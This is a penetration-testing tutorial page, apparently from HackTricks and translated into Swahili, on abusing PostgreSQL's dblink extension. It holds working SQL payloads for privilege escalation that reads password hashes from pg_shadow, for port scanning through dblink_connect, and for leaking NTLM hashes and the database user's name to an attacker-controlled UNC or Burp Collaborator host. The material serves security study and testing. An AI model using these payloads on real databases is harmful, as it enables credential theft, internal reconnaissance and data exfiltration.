# Network - Privesc, Port Scanner and NTLM chanllenge response disclosure {{#include ../../../banners/hacktricks-training.md}} **Pata** [**maelezo zaidi kuhusu mashambulizi haya katika karatasi asilia**](http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt). Tangu **PostgreSQL 9.1**, ufungaji wa moduli za ziada ni rahisi. [Marekebisho yaliyoandikishwa kama `dblink`](https://www.postgresql.org/docs/current/contrib.html) yanaweza kufungwa kwa kutumia [`CREATE EXTENSION`](https://www.postgresql.org/docs/current/sql-createextension.html): ```sql CREATE EXTENSION dblink; ``` Mara tu umepakia dblink unaweza kuwa na uwezo wa kufanya hila za kuvutia: ### Kuinua Mamlaka Faili `pg_hba.conf` inaweza kuwa imewekwa vibaya **ikikubali muunganisho** kutoka **localhost kama mtumiaji yeyote** bila kuhitaji kujua nenosiri. Faili hii inaweza kupatikana kawaida katika `/etc/postgresql/12/main/pg_hba.conf` na usanidi mbaya unaonekana kama: ``` local all all trust ``` _Kumbuka kwamba usanidi huu hutumiwa mara nyingi kubadilisha nenosiri la mtumiaji wa db wakati msimamizi analisahau, hivyo wakati mwingine unaweza kuliona._\ _Kumbuka pia kwamba faili pg_hba.conf inaweza kusomwa tu na mtumiaji na kikundi cha postgres na inaweza kuandikwa tu na mtumiaji wa postgres._ Kesi hii ni **faida ikiwa** tayari una **shell** ndani ya mwathirika kwani itakuruhusu kuungana na hifadhidata ya postgresql. Makosa mengine yanayoweza kutokea ni kama ifuatavyo: ``` host all all 127.0.0.1/32 trust ``` Kwa sababu itaruhusu kila mtu kutoka kwenye localhost kuungana na database kama mtumiaji yeyote.\ Katika kesi hii na ikiwa kazi ya **`dblink`** inafanya **kazi**, unaweza **kuinua mamlaka** kwa kuungana na database kupitia muunganisho ulioanzishwa tayari na kufikia data ambayo haupaswi kuwa na uwezo wa kufikia: ```sql SELECT * FROM dblink('host=127.0.0.1 user=postgres dbname=postgres', 'SELECT datname FROM pg_database') RETURNS (result TEXT); SELECT * FROM dblink('host=127.0.0.1 user=postgres dbname=postgres', 'select usename, passwd from pg_shadow') RETURNS (result1 TEXT, result2 TEXT); ``` ### Port Scanning Kwa kutumia `dblink_connect` unaweza pia **kutafuta bandari zilizo wazi**. Ikiwa hiyo **kazi haifanyi kazi unapaswa kujaribu kutumia `dblink_connect_u()` kama hati inavyosema kwamba `dblink_connect_u()` ni sawa na `dblink_connect()`, isipokuwa itaruhusu watumiaji wasiokuwa wasimamizi kuungana kwa kutumia njia yoyote ya uthibitishaji\_. ```sql SELECT * FROM dblink_connect('host=216.58.212.238 port=443 user=name password=secret dbname=abc connect_timeout=10'); //Different response // Port closed RROR: could not establish connection DETAIL: could not connect to server: Connection refused Is the server running on host "127.0.0.1" and accepting TCP/IP connections on port 4444? // Port Filtered/Timeout ERROR: could not establish connection DETAIL: timeout expired // Accessing HTTP server ERROR: could not establish connection DETAIL: timeout expired // Accessing HTTPS server ERROR: could not establish connection DETAIL: received invalid response to SSL negotiation: ``` Kumbuka kwamba **kabla** ya kuwa na uwezo wa kutumia `dblink_connect` au `dblink_connect_u` unaweza kuhitaji kutekeleza: ``` CREATE extension dblink; ``` ### UNC njia - kufichuliwa kwa NTLM hash ```sql -- can be used to leak hashes to Responder/equivalent CREATE TABLE test(); COPY test FROM E'\\\\attacker-machine\\footestbar.txt'; ``` ```sql -- to extract the value of user and send it to Burp Collaborator CREATE TABLE test(retval text); CREATE OR REPLACE FUNCTION testfunc() RETURNS VOID AS $$ DECLARE sqlstring TEXT; DECLARE userval TEXT; BEGIN SELECT INTO userval (SELECT user); sqlstring := E'COPY test(retval) FROM E\'\\\\\\\\'||userval||E'.xxxx.burpcollaborator.net\\\\test.txt\''; EXECUTE sqlstring; END; $$ LANGUAGE plpgsql SECURITY DEFINER; SELECT testfunc(); ``` {{#include ../../../banners/hacktricks-training.md}}